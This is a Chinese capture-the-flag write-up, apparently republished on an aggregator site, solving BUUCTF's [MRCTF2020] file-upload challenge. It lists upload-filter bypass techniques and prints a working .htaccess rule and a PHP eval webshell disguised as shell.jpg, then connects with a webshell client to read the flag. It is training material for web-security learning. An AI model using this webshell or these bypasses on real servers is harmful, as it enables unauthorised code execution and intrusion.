BUUCTF闯关日记--[MRCTF2020]你传你呢(超详解)

这篇具有很好参考价值的文章主要介绍了BUUCTF闯关日记--[MRCTF2020]你传你呢(超详解)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

进入页面

BUUCTF闯关日记--[MRCTF2020]你传你呢(超详解)

文件上传漏洞,因为有些人没看过我前面的文章我再把我的总结发一下

1、前端绕过,抓包修改后缀名,

2、文件内容绕过,用图片马,抓包修改后缀绕过

3、黑名单绕过,那么我们可以改成phtml抓包绕过

4、.htaccess绕过,只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg(就是把所以jpg后缀的文件全都当作php文件来执行)”

5、大小写绕过,抓包后修改后缀为.PHp

7、空格绕过,抓包修改后缀,在后缀后面加上空格

8、点绕过,抓包修改后缀,在后缀后面加上点(删掉空格还可以. .或者 . )

9、文件流绕过,前提条件,必须是window的服务器,抓包修改后缀,并在后缀后面加上::$DATA,

10、双拼绕过,抓包修改后缀,并在把后缀改成pphphp,这样后端去掉php,还剩下个p和hp组合在一起,又是php

11、.user.ini配置文件绕过

思路要明确,不要做只会做题的做题机器,你要连接你的木马

而普通的jpg文件png文件不能连接你的木马

所以先试一试普通php文件(当然了要抓包绕过一下前端),把各种双写,大小写,空格绕过都试一遍,回显都是

BUUCTF闯关日记--[MRCTF2020]你传你呢(超详解)

只好从配置文件入手

上传你的.htaccess文件,内容是

 文章来源地址https://www.toymoban.com/news/detail-438525.html

<FilesMatch "shell.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

上传的时候要注意改一个地方

BUUCTF闯关日记--[MRCTF2020]你传你呢(超详解)

可以发现上传成功

BUUCTF闯关日记--[MRCTF2020]你传你呢(超详解) 

接下来就是我们的shell.jpg

内容是

 

<script language='php'>eval($_REQUEST[8]);</script>

不使用<?php eva($_REQUEST[8])?>系统很爱检测<?

然后上传我们的shell.jpg

BUUCTF闯关日记--[MRCTF2020]你传你呢(超详解)

成功.访问shell.jpg,有很多人不知道具体路径到底是什么,其实就是革除www/html

所以访问的地址就是4e2d98f5-f26c-4266-b655-de8ef2bea07f.node4.buuoj.cn:81/upload/eef153c3bd8cc752cf5c14881e095871/shell.jpg 可以看到回显是

BUUCTF闯关日记--[MRCTF2020]你传你呢(超详解)

没错,一片空白,很有希望了,因为他不再被当作jpg解析

试一下有没有连接成功,传入?8=phpinfo();

BUUCTF闯关日记--[MRCTF2020]你传你呢(超详解) 

成功!可以去连接菜刀了成功拿到flag

BUUCTF闯关日记--[MRCTF2020]你传你呢(超详解) 

flag在根目录,就是那个磁盘的第一层级

BUUCTF闯关日记--[MRCTF2020]你传你呢(超详解) flag{0a5ddaae-3ea7-413a-9744-e546c3815454}

 

到了这里,关于BUUCTF闯关日记--[MRCTF2020]你传你呢(超详解)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • BUUCTF Brute 1使用BurpSuite爆破详解

    最近研究一下白帽子安全,主要关注WEB安全,在做完了常规的靶场xsslab、SQLI、DVWA、Pikachu后,了解了白帽子安全的基础知识。进一步开始用一些CTF来练习。本文是从BUUCTF网站上,去解一个WEB的Flag的详细记录。 0x00 打开BUUCTF,打开靶机 BUUCTF的地址在这里:BUUCTF在线评测 (buuo

    2024年02月03日
    浏览(25)
  • CVE-2020-14750 漏洞复现和Linux打补丁详解

    使用的工具整理:jdk1.79,weblogic安装包(中文版),两个补丁包 链接:https://pan.baidu.com/s/1ehrO4fjv7beth2fp06XXPA?pwd=z8ju 提取码:z8ju 漏洞环境搭建参考如下博客: [(64条消息) 详细教程]jdk官方下载,Linux安装jdk1.7,图文解说,一看就会_gosin1994的博客-CSDN博客_linux 1.7 官网下载 (64条消

    2024年02月05日
    浏览(25)
  • 【学习日记】【FreeRTOS】调度器函数实现详解

    本文主要是对于 FreeRTOS 中调度器函数实现的详细解释,代码大部分参考了野火 FreeRTOS 教程配套源码,作了一小部分修改。 Cortex-M有两种栈空间,主堆栈和进程堆栈。 MSP 用于系统级别和中断处理的堆栈 MSP 用于保存中断发生时的堆栈状态以及在特殊操作(例如任务切换)期间

    2024年02月13日
    浏览(19)
  • 电子设计竞赛2020年E题从电路到代码,电路篇详解

    这道电赛题对于入门信号题的童学是一个很好的阶梯,从中大家可以看到与书本上一样的图像,而且做完会很有成就感。 楼主焊的很丑,希望大家不要有良好的审美观,不要像我学习。 这是我第一个做出来的信号题,顺便来详细讲一下我的制作步骤,当然里面也有很多讲解

    2024年02月09日
    浏览(27)
  • CMU15445 (Fall 2020) 之 Project#1 - Buffer Pool 详解

    去年暑假完成了 CMU15-445 Fall 2019 的四个实验,分别对应下述博客: CMU15445 (Fall 2019) 之 Project#1 - Buffer Pool 详解 CMU15445 (Fall 2019) 之 Project#2 - Hash Table 详解 CMU15445 (Fall 2019) 之 Project#3 - Query Execution 详解 CMU15445 (Fall 2019) 之 Project#4 - Logging Recovery 详解 今年打算接着完成 Fall 2020 的四个

    2024年02月08日
    浏览(29)
  • [系统安全] 五十二.DataCon竞赛 (1)2020年Coremail钓鱼邮件识别及分类详解

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列。因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全、逆向分析和恶意代码检测,“系统安全”系列文章会更

    2024年02月13日
    浏览(26)
  • CMU15445 (Fall 2020) 数据库系统 Project#2 - B+ Tree 详解(上篇)

    考虑到 B+ 树较为复杂,CMU15-445 将 B+ 树实验拆成了两部分,这篇博客将介绍 Checkpoint#1、Checkpoint#2 删除操作和迭代器的实现过程,搭配教材 《DataBase System Concepts》食用更佳。 许多查询只涉及文件中的少量记录,例如“找出物理系所有教师”的查询就只涉及教师记录中的一小部

    2024年02月08日
    浏览(34)
  • Unity2020打包安卓时配置环境踩过的坑(JDK&SDK&NDK&Gradle详解)

    之前的打包环境都是吃现成的, 这次新公司需要自己配置,踩了坑记录一下,以防之后遗忘.  如果是 用Hub管理的项目 可以通过Hub 去下载 安装内置的Open JDK ,SDK 等很方便也稳定. 没有用Hub的话 只能自己苦逼的去一个一个下载和配置 或者 通过Android studio 去下载. 1. JDK        

    2023年04月13日
    浏览(31)
  • 摸鱼大作战闯关

    查看源代码 查看源代码 F12 看源码   英语是真的烂 凯撒密码   十六进制 base64解密  创建post请求输入空密码 同上  

    2024年02月11日
    浏览(22)
  • 闯关打卡小程序的效果如何

    闯关打卡是一种以任务关卡为基础的打卡模式,管理员可配置活动任务关卡,成员加入任务后需依次解锁,打卡完成任务,像闯关游戏一样完成所有任务。 通过打卡活动聚集一群有共同目标、兴趣的人,通过打卡的方式促进共同目标的达成。活动支持变现,适用于教育培训、

    2024年02月05日
    浏览(18)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包